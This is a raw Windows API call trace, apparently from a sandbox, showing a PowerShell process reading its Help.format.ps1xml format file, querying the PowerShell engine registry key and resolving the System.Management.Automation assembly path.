	[0426.557] VirtualQuery (in: lpAddress=0x18c0e0, lpBuffer=0x18cfa0, dwLength=0x30 | out: lpBuffer=0x18cfa0*(BaseAddress=0x18c000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0426.558] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0x7bd9535b, Data2=0x2785, Data3=0x4965, Data4=([0]=0xad, [1]=0xf1, [2]=0x79, [3]=0x26, [4]=0x76, [5]=0xdf, [6]=0x22, [7]=0xdb))) returned 0x0
	[0426.558] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0x1c09dd64, Data2=0x3722, Data3=0x4f2b, Data4=([0]=0xa4, [1]=0x4c, [2]=0x33, [3]=0x33, [4]=0xe4, [5]=0xa9, [6]=0xb3, [7]=0xce))) returned 0x0
	[0426.558] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0x21028fb4, Data2=0xd677, Data3=0x4b34, Data4=([0]=0xaf, [1]=0x6e, [2]=0xda, [3]=0xfc, [4]=0xa7, [5]=0xe3, [6]=0xef, [7]=0xe2))) returned 0x0
	[0426.558] VirtualQuery (in: lpAddress=0x18c0e0, lpBuffer=0x18cfa0, dwLength=0x30 | out: lpBuffer=0x18cfa0*(BaseAddress=0x18c000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0426.558] VirtualQuery (in: lpAddress=0x18c0e0, lpBuffer=0x18cfa0, dwLength=0x30 | out: lpBuffer=0x18cfa0*(BaseAddress=0x18c000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0426.558] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x18cef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0426.558] SetErrorMode (uMode=0x1) returned 0x1
	[0426.558] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x1c4
	[0426.558] GetFileType (hFile=0x1c4) returned 0x1
	[0426.559] SetErrorMode (uMode=0x1) returned 0x1
	[0426.559] GetFileType (hFile=0x1c4) returned 0x1
	[0426.559] ReadFile (in: hFile=0x1c4, lpBuffer=0x2ec9410, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x2ec9410*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0426.559] ReadFile (in: hFile=0x1c4, lpBuffer=0x2ec9410, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x2ec9410*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0426.560] ReadFile (in: hFile=0x1c4, lpBuffer=0x2ec9410, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x2ec9410*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0426.560] ReadFile (in: hFile=0x1c4, lpBuffer=0x2ec9410, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x2ec9410*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0426.560] ReadFile (in: hFile=0x1c4, lpBuffer=0x2ec9410, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x2ec9410*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0426.560] ReadFile (in: hFile=0x1c4, lpBuffer=0x2ec9410, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x2ec9410*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0426.560] ReadFile (in: hFile=0x1c4, lpBuffer=0x2ec9410, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x2ec9410*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0426.560] ReadFile (in: hFile=0x1c4, lpBuffer=0x2ec9410, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x2ec9410*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0426.561] ReadFile (in: hFile=0x1c4, lpBuffer=0x2ec9410, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x2ec9410*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0426.561] ReadFile (in: hFile=0x1c4, lpBuffer=0x2ec9410, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x2ec9410*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0426.562] ReadFile (in: hFile=0x1c4, lpBuffer=0x2ec9410, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x2ec9410*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0426.562] ReadFile (in: hFile=0x1c4, lpBuffer=0x2ec9410, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x2ec9410*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0426.562] ReadFile (in: hFile=0x1c4, lpBuffer=0x2ec9410, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x2ec9410*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0426.562] ReadFile (in: hFile=0x1c4, lpBuffer=0x2ec9410, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x2ec9410*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0426.562] ReadFile (in: hFile=0x1c4, lpBuffer=0x2ec9410, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x2ec9410*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0426.563] ReadFile (in: hFile=0x1c4, lpBuffer=0x2ec9410, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x2ec9410*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0426.564] ReadFile (in: hFile=0x1c4, lpBuffer=0x2ec9410, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x2ec9410*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0426.564] ReadFile (in: hFile=0x1c4, lpBuffer=0x2ec9410, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x2ec9410*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0426.564] ReadFile (in: hFile=0x1c4, lpBuffer=0x2ec9410, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x2ec9410*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0426.565] ReadFile (in: hFile=0x1c4, lpBuffer=0x2ec9410, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x2ec9410*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0426.565] ReadFile (in: hFile=0x1c4, lpBuffer=0x2ec9410, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x2ec9410*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0426.565] ReadFile (in: hFile=0x1c4, lpBuffer=0x2ec9410, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x2ec9410*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0426.565] ReadFile (in: hFile=0x1c4, lpBuffer=0x2ec9410, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x2ec9410*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0426.565] ReadFile (in: hFile=0x1c4, lpBuffer=0x2ec9410, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x2ec9410*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0426.566] ReadFile (in: hFile=0x1c4, lpBuffer=0x2ec9410, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x2ec9410*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0426.566] ReadFile (in: hFile=0x1c4, lpBuffer=0x2ec9410, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x2ec9410*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0426.566] ReadFile (in: hFile=0x1c4, lpBuffer=0x2ec9410, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x2ec9410*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0426.566] ReadFile (in: hFile=0x1c4, lpBuffer=0x2ec9410, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x2ec9410*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0426.566] ReadFile (in: hFile=0x1c4, lpBuffer=0x2ec9410, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x2ec9410*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0426.567] ReadFile (in: hFile=0x1c4, lpBuffer=0x2ec9410, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x2ec9410*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0426.567] ReadFile (in: hFile=0x1c4, lpBuffer=0x2ec9410, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x2ec9410*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0426.567] ReadFile (in: hFile=0x1c4, lpBuffer=0x2ec9410, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x2ec9410*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0426.569] ReadFile (in: hFile=0x1c4, lpBuffer=0x2ec9410, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x2ec9410*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0426.569] ReadFile (in: hFile=0x1c4, lpBuffer=0x2ec9410, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x2ec9410*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0426.569] ReadFile (in: hFile=0x1c4, lpBuffer=0x2ec9410, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x2ec9410*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0426.570] ReadFile (in: hFile=0x1c4, lpBuffer=0x2ec9410, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x2ec9410*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0426.570] ReadFile (in: hFile=0x1c4, lpBuffer=0x2ec9410, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x2ec9410*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0426.570] ReadFile (in: hFile=0x1c4, lpBuffer=0x2ec9410, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x2ec9410*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0426.570] ReadFile (in: hFile=0x1c4, lpBuffer=0x2ec9410, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x2ec9410*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0426.571] ReadFile (in: hFile=0x1c4, lpBuffer=0x2ec9410, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x2ec9410*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0426.571] ReadFile (in: hFile=0x1c4, lpBuffer=0x2ec9410, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x2ec9410*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0426.571] ReadFile (in: hFile=0x1c4, lpBuffer=0x2ec9410, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x2ec9410*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0426.571] ReadFile (in: hFile=0x1c4, lpBuffer=0x2ec9410, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x2ec9410*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0426.571] ReadFile (in: hFile=0x1c4, lpBuffer=0x2ec9410, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x2ec9410*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0426.571] ReadFile (in: hFile=0x1c4, lpBuffer=0x2ec9410, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x2ec9410*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0426.572] ReadFile (in: hFile=0x1c4, lpBuffer=0x2ec9410, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x2ec9410*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0426.572] ReadFile (in: hFile=0x1c4, lpBuffer=0x2ec9410, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x2ec9410*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0426.572] ReadFile (in: hFile=0x1c4, lpBuffer=0x2ec9410, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x2ec9410*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0426.572] ReadFile (in: hFile=0x1c4, lpBuffer=0x2ec9410, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x2ec9410*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0426.572] ReadFile (in: hFile=0x1c4, lpBuffer=0x2ec9410, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x2ec9410*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0426.572] ReadFile (in: hFile=0x1c4, lpBuffer=0x2ec9410, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x2ec9410*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0426.572] ReadFile (in: hFile=0x1c4, lpBuffer=0x2ec9410, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x2ec9410*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0426.573] ReadFile (in: hFile=0x1c4, lpBuffer=0x2ec9410, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x2ec9410*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0426.573] ReadFile (in: hFile=0x1c4, lpBuffer=0x2ec9410, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x2ec9410*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0426.573] ReadFile (in: hFile=0x1c4, lpBuffer=0x2ec9410, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x2ec9410*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0426.573] ReadFile (in: hFile=0x1c4, lpBuffer=0x2ec9410, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x2ec9410*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0426.573] ReadFile (in: hFile=0x1c4, lpBuffer=0x2ec9410, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x2ec9410*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0426.573] ReadFile (in: hFile=0x1c4, lpBuffer=0x2ec9410, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x2ec9410*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0426.804] ReadFile (in: hFile=0x1c4, lpBuffer=0x2ec9410, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x2ec9410*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0426.804] ReadFile (in: hFile=0x1c4, lpBuffer=0x2ec9410, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x2ec9410*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0426.804] ReadFile (in: hFile=0x1c4, lpBuffer=0x2ec9410, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x2ec9410*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0426.804] ReadFile (in: hFile=0x1c4, lpBuffer=0x2ec9410, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x2ec9410*, lpNumberOfBytesRead=0x18d478*=0x1000, lpOverlapped=0x0) returned 1
	[0426.804] ReadFile (in: hFile=0x1c4, lpBuffer=0x2ec9410, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x2ec9410*, lpNumberOfBytesRead=0x18d478*=0xf37, lpOverlapped=0x0) returned 1
	[0426.804] ReadFile (in: hFile=0x1c4, lpBuffer=0x2ec8aaf, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x2ec8aaf*, lpNumberOfBytesRead=0x18d478*=0x0, lpOverlapped=0x0) returned 1
	[0426.804] ReadFile (in: hFile=0x1c4, lpBuffer=0x2ec9410, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d478, lpOverlapped=0x0 | out: lpBuffer=0x2ec9410*, lpNumberOfBytesRead=0x18d478*=0x0, lpOverlapped=0x0) returned 1
	[0426.804] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x18d1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0426.805] SetErrorMode (uMode=0x1) returned 0x1
	[0426.805] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x18d420 | out: lpFileInformation=0x18d420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0426.805] SetErrorMode (uMode=0x1) returned 0x1
	[0426.805] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x18d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0426.805] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d508 | out: phkResult=0x18d508*=0x1c4) returned 0x0
	[0426.805] RegQueryValueExW (in: hKey=0x1c4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x18d48c, lpData=0x0, lpcbData=0x18d488*=0x0 | out: lpType=0x18d48c*=0x1, lpData=0x0, lpcbData=0x18d488*=0x56) returned 0x0
	[0426.805] CoTaskMemAlloc (cb=0x5a) returned 0x2a5400
	[0426.805] RegQueryValueExW (in: hKey=0x1c4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x18d45c, lpData=0x2a5400, lpcbData=0x18d458*=0x56 | out: lpType=0x18d45c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x18d458*=0x56) returned 0x0
	[0426.805] CoTaskMemFree (pv=0x2a5400) 
	[0426.805] RegCloseKey (hKey=0x1c4) returned 0x0
	[0426.805] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x18d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0426.806] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x18d000, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0426.810] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0x2f47ee35, Data2=0x8693, Data3=0x414a, Data4=([0]=0xbf, [1]=0x44, [2]=0x20, [3]=0xf3, [4]=0x91, [5]=0x64, [6]=0x3c, [7]=0xc0))) returned 0x0
	[0426.810] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0xbbf3b3cb, Data2=0x4006, Data3=0x46f6, Data4=([0]=0xa0, [1]=0x41, [2]=0x76, [3]=0xd8, [4]=0x5a, [5]=0xad, [6]=0x9c, [7]=0x1c))) returned 0x0
	[0426.810] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0426.810] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0426.811] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0426.811] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.182] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.183] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.183] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0427.183] CoCreateGuid (in: pguid=0x18d730 | out: pguid=0x18d730*(Data1=0x3d300066, Data2=0x4194, Data3=0x4445, Data4=([0]=0xae, [1]=0xaa, [2]=0x87, [3]=0xfd, [4]=0x88, [5]=0x3d, [6]=0x47, [7]=0x2d))) returned 0x0
